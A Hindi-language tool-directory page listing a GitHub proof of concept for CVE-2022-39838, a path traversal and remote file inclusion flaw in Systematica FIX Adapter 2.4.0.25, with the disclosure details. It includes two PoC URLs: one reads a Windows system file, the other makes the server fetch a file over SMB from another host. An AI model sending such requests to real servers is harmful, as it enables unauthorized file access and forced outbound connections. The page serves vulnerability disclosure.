Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-39838 — CVE-2022-39838 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो HTTP अनुरोधों के माध्यम से Systematica FIX Adapter (ALFAFX) 2.4.0.25 में रिमोट फ़ाइल इंक्लूज़न और एब्सोल्यूट पाथ ट्रैवर्सल का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/jet-pentest/cve-2022-39838
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjet-pentest/cve-2022-39838

CVE-2022-39838

CVE-2022-39838 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो HTTP अनुरोधों के माध्यम से Systematica FIX Adapter (ALFAFX) 2.4.0.25 में रिमोट फ़ाइल इंक्लूज़न और एब्सोल्यूट पाथ ट्रैवर्सल का प्रदर्शन करता है।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-39838

[सुझाया गया विवरण]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 एक UNC शेयर पथनाम के माध्यम से दूरस्थ फ़ाइल समावेशन की अनुमति देता है, और स्थानीय पथनामों तक पूर्ण पथ ट्रैवर्सल की भी अनुमति देता है।

[अतिरिक्त जानकारी]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[भेद्यता प्रकार]

गलत अभिगम नियंत्रण

[उत्पाद का विक्रेता]

Systematica

[प्रभावित उत्पाद कोड आधार]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[हमले का प्रकार]

दूरस्थ

[प्रभाव सूचना प्रकटीकरण]

सत्य

[हमले के वैक्टर]

दूरस्थ उपयोगकर्ता पूर्ण पथ के माध्यम से OS में किसी भी फ़ाइल तक पहुंच प्राप्त कर सकता है। इसके अलावा, दूरस्थ उपयोगकर्ता कमजोर सर्वर को smb के माध्यम से किसी अन्य मशीन से फ़ाइल का अनुरोध करने के लिए मजबूर कर सकता है।

[खोजकर्ता]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[संदर्भ]

http://systematicalpha.com/company

टूल डाउनलोड करें